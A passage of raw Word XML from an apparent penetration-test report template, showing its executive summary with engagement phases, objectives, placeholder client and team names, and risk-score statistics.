                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Security Consult</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1FE0CEE8" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>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49B6" w:rsidRPr="00071C21" w14:paraId="3998726A" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="0E6E53FB" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00071C21" w:rsidRDefault="007E49B6">
                  <w:pPr>
                    <w:pStyle w:val="ListParagraph"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="286A291F" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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BB85139" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00587442">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>ahmed.alisallam@company.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3910ABB5" w14:textId="77777777" w:rsidR="007E49B6" w:rsidRPr="00587442" w:rsidRDefault="007E49B6">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17EA7CC2" w14:textId="39E5B6C6" w:rsidR="00F47B5B" w:rsidRPr="00112704" w:rsidRDefault="00F47B5B" w:rsidP="00F47B5B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71629095" w14:textId="409BC171" w:rsidR="006B546A" w:rsidRPr="00685496" w:rsidRDefault="00922DBC" w:rsidP="00080535">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc178498952"/>
      <w:r w:rsidRPr="00685496">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6D570270" w14:textId="1F058180" w:rsidR="006B546A" w:rsidRPr="00ED4108" w:rsidRDefault="00ED4108" w:rsidP="00685496">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc178498953"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00ED4108">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="2E6AD2C5" w14:textId="77777777" w:rsidR="006D2070" w:rsidRDefault="006B546A" w:rsidP="00C9532E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5EA91A06">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On June 27, 2024, through June 28, 2024, 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5EA91A06">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xBugatti .Co</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="5EA91A06">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Corporation was engaged by [Client] to conduct a thorough security assessment of a specified target. The assessment comprised three distinct phases: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A4DC2" w14:textId="43C66DEB" w:rsidR="006D2070" w:rsidRPr="006D2070" w:rsidRDefault="006D2070" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="006D2070">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xternal Network Vulnerability Assessment/Penetration Test (NVA/PT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503CECD4" w14:textId="2A8BD6D7" w:rsidR="006D2070" w:rsidRPr="006D2070" w:rsidRDefault="006D2070" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="006D2070">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nternal NVA/PT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7866B986" w14:textId="77777777" w:rsidR="006D2070" w:rsidRPr="006D2070" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2070">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Assessment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42D311" w14:textId="5BB16464" w:rsidR="00357901" w:rsidRPr="00AA3904" w:rsidRDefault="00625DEE" w:rsidP="00625DEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3904">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00AA3904">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">bjectives were to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E69C7" w14:textId="411E7902" w:rsidR="00625DEE" w:rsidRPr="00625DEE" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00357901">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify security vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00847958">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA8754" w14:textId="6B9B5526" w:rsidR="00625DEE" w:rsidRPr="00625DEE" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00357901">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>assess the effectiveness of existing security controls</w:t>
      </w:r>
      <w:r w:rsidR="00847958">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C036C" w14:textId="77777777" w:rsidR="0023078D" w:rsidRDefault="0023078D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Explain the potential impact of the identified vulnerabilities, such as the extent of data exposure, potential financial losses, or reputational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C82598" w14:textId="65980739" w:rsidR="0023078D" w:rsidRDefault="0023078D" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>damage that could occur if they were exploited by malicious actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C36BE" w14:textId="31635AEF" w:rsidR="00612424" w:rsidRPr="00EA73DE" w:rsidRDefault="006167BC" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006167BC">
        <w:t>Recommend technical security best practices to improve security posture of the target applications audited</w:t>
      </w:r>
      <w:r w:rsidR="00847958">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D059E5E" w14:textId="4F5CC9AB" w:rsidR="00EA73DE" w:rsidRPr="00EA73DE" w:rsidRDefault="00ED4108" w:rsidP="00EA73DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc178498954"/>
      <w:r w:rsidRPr="00ED4108">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00ED4108">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Summary of Findings:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="62D50E2F" w14:textId="7683B70C" w:rsidR="006B546A" w:rsidRPr="00612424" w:rsidRDefault="00612424" w:rsidP="00612424">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc178498955"/>
      <w:r w:rsidRPr="00612424">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00612424">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="004032F7" w:rsidRPr="00612424">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ies </w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00612424">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">and Risk </w:t>
      </w:r>
      <w:r w:rsidR="004C5CCF" w:rsidRPr="00612424">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ov</w:t>
      </w:r>
      <w:r w:rsidR="00F77E25" w:rsidRPr="00612424">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>erview</w:t>
      </w:r>
      <w:r w:rsidR="0051706C" w:rsidRPr="00612424">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3C6B2505" w14:textId="0EEEF002" w:rsidR="00B84794" w:rsidRDefault="00D9699E" w:rsidP="0018777F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TEAM NAME&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">performed a security assessment of </w:t>
      </w:r>
      <w:r w:rsidR="00CC2349">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SCOPE</w:t>
      </w:r>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of &lt;CLIENT &gt; on &lt;TEST DATE&gt;. </w:t>
      </w:r>
      <w:r w:rsidR="00522252">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">penetration test simulated an attack from an </w:t>
      </w:r>
      <w:r w:rsidR="00562B23" w:rsidRPr="00BC5C28">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inter</w:t>
      </w:r>
      <w:r w:rsidR="00BC5C28" w:rsidRPr="00BC5C28">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nal/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC5C28">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>external</w:t>
      </w:r>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> threat actor attempting to </w:t>
      </w:r>
      <w:r w:rsidR="00ED44EE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">compromise </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED44EE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systems</w:t>
      </w:r>
      <w:r w:rsidR="00ED44EE" w:rsidRPr="00ED44EE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/APPs</w:t>
      </w:r>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the &lt;CLIENT&gt; corporate network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF28D0C" w14:textId="31937A48" w:rsidR="00B84794" w:rsidRPr="00B84794" w:rsidRDefault="00D9699E" w:rsidP="0018777F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B84794">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00ED44EE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84794">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of this assessment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E881B3A" w14:textId="77777777" w:rsidR="00E0093A" w:rsidRDefault="00D9699E" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">discover and identify vulnerabilities in &lt;CLIENT NAME&gt;’s infrastructure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A60F72" w14:textId="27A275A6" w:rsidR="00B84794" w:rsidRPr="00E0093A" w:rsidRDefault="00D9699E" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0093A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>suggest methods to remediate the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA72F19" w14:textId="77777777" w:rsidR="00A35C6A" w:rsidRDefault="008F521C" w:rsidP="00A92EA8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008055B9">
        <w:t>A total of N vulnerabilities/recommendations were reported</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00D9699E" w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;TEAM NAME&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D9699E" w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">within the scope of the engagement </w:t>
      </w:r>
      <w:r w:rsidR="004A34BF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00010B58" w:rsidRPr="00010B58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048986B3" w14:textId="77777777" w:rsidR="005D5107" w:rsidRDefault="00010B58" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="005D5107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ighest</w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="005D5107">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="008055B9">
        <w:t xml:space="preserve">risk score assigned to a vulnerability was </w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="005D5107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>9.2</w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="008055B9">
        <w:t>, the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56866BEF" w14:textId="77777777" w:rsidR="005D5107" w:rsidRPr="005D5107" w:rsidRDefault="00010B58" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="005D5107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>owest</w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="005D5107">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="008055B9">
        <w:t xml:space="preserve">was 2.5, and the average score was </w:t>
      </w:r>
      <w:r w:rsidR="005D5107" w:rsidRPr="005D5107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="005D5107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C982CC" w14:textId="29ABA4B5" w:rsidR="00A92EA8" w:rsidRDefault="005D5107" w:rsidP="005D5107">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004A34BF" w:rsidRPr="005D5107">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">all them </w:t>
      </w:r>
      <w:r w:rsidR="00D9699E" w:rsidRPr="005D5107">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ar</w:t>
      </w:r>
      <w:r w:rsidR="00A92EA8" w:rsidRPr="005D5107">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">e broken down by severity in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D5107">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chart ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D5107">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A92EA8" w:rsidRPr="005D5107">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table below.</w:t>
      </w:r>
      <w:r w:rsidR="00A92EA8" w:rsidRPr="005D5107">
        <w:rPr>
